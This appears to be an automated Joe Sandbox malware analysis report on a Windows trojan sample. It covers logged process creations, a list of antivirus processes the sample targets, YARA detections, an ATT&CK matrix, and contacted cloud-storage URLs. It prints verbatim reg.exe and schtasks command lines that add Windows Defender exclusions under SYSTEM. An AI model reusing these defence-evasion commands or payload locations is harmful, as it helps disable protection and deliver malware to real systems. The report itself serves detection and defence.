              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A51FD40 cpuid 4_2_00007FFE1A51FD40
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: GetLocaleInfoA,4_2_000000014000F370
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: GetLocaleInfoA,40_2_00B26B1A
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCode function: GetLocaleInfoA,42_2_006C6B1A
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_000000014000A370
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_0000000140005A70
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360safe.exe
              Source: 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SuperKiller.exe
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
              Source: 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: Autoruns.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
              Source: 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
              Source: 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Mcshield.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe

              Stealing of Sensitive Information

              Source: Yara matchFile source: 40.2.2dHqG0.exe.10000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.2dHqG0.exe.38003e8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.2dHqG0.exe.38003e8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 2dHqG0.exe PID: 5576, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara matchFile source: 40.2.2dHqG0.exe.10000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.2dHqG0.exe.38003e8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.2dHqG0.exe.38003e8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 2dHqG0.exe PID: 5576, type: MEMORYSTR
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,4_2_00000001400042B0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,4_2_0000000140003F80
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 113 Command and Scripting Interpreter | 33 Windows Service | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 4 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 11 Scheduled Task/Job | 11 Scheduled Task/Job | 1 Access Token Manipulation | 2 Obfuscated Files or Information | Security Account Manager | 223 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 12 Service Execution | 1 Registry Run Keys / Startup Folder | 33 Windows Service | 1 Software Packing | NTDS | 331 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 11 Process Injection | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 11 Scheduled Task/Job | 32 Masquerading | Cached Domain Credentials | 11 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 1 Modify Registry | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 11 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
              [Behavior Graph ID: 1586401 Sample: 2o63254452-763487230.06.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100]

              Source | Detection | Scanner | Label | Link
              2o63254452-763487230.06.exe | 11% | Virustotal |  | Browse

              Source | Detection | Scanner | Label | Link
              C:\Program Files (x86)\8srsV\tbcore3U.dll | 100% | Avira | TR/Redcap.vdzex |
              C:\Program Files (x86)\2dHqG0\tbcore3U.dll | 100% | Avira | TR/Redcap.vdzex |
              C:\Program Files (x86)\8srsV\tbcore3U.dll | 100% | Joe Sandbox ML |  |
              C:\Program Files (x86)\2dHqG0\tbcore3U.dll | 100% | Joe Sandbox ML |  |
              C:\Program Files (x86)\2dHqG0\2dHqG0.exe | 0% | ReversingLabs |  |
              C:\Program Files (x86)\8srsV\pw8XjN.exe | 0% | ReversingLabs |  |
              C:\Users\Public\Music\destopbak.ini | 0% | ReversingLabs |  |
              C:\Users\user\Documents\BEqRkb.exe | 0% | ReversingLabs |  |
              No Antivirus matches
              No Antivirus matches
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | 118.178.60.9 | true | false |  | high
              a8mw1y.oss-cn-beijing.aliyuncs.com | 59.110.190.44 | true | false |  | unknown
              qsuula.net | unknown | unknown | false |  | unknown
              22mm.oss-cn-hangzhou.aliyuncs.com | unknown | unknown | false |  | high
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.giff2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.symauth.com/cps0(2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifg2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://%s/upx.rarC:2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gifFS2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1002)ZBEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://%s/ip.txtC:2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.symauth.com/rpa002o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgmingBEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gifp2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgTBEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gif1S2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://%s/ip.txt2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gifIS72o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gifFSw2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://22mm.oss-cn-hangzhou.aliyuncs.com/BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://%s/upx.rar2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg6BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gif:2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
IP: 59.110.190.44; Domain: a8mw1y.oss-cn-beijing.aliyuncs.com; Country: China; ASN: 37963; ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd; Malicious: false
IP: 118.178.60.9; Domain: sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com; Country: China; ASN: 37963; ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd; Malicious: false
IP: 47.243.243.58; Domain: unknown; Country: United States; ASN: 45102; ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC; Malicious: true
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1586401
                                            Start date and time:2025-01-09 01:51:21 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 37s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Run name:Run with higher sleep bypass
                                            Number of analysed new started processes analysed:49
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:2o63254452-763487230.06.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@67/29@8/3
                                            EGA Information:
                                            • Successful, ratio: 75%
                                            HCA Information:
                                            • Successful, ratio: 62%
                                            • Number of executed functions: 21
                                            • Number of non-executed functions: 118
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target BEqRkb.exe, PID 8188 because there are no executed function
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time: 00:53:11; Type: Task Scheduler; Description: Run new task: 1Ynue path: C:\Users\user\Documents\BEqRkb.exe
Time: 00:54:50; Type: Task Scheduler; Description: Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 BtGTb path: C:\Program Files (x86)\2dHqG0\2dHqG0.exe
Time: 00:54:50; Type: Task Scheduler; Description: Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 CBrMA path: C:\Program Files (x86)\8srsV\pw8XjN.exe
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):54152
                                                                                      Entropy (8bit):6.64786972992462
                                                                                      Encrypted:false
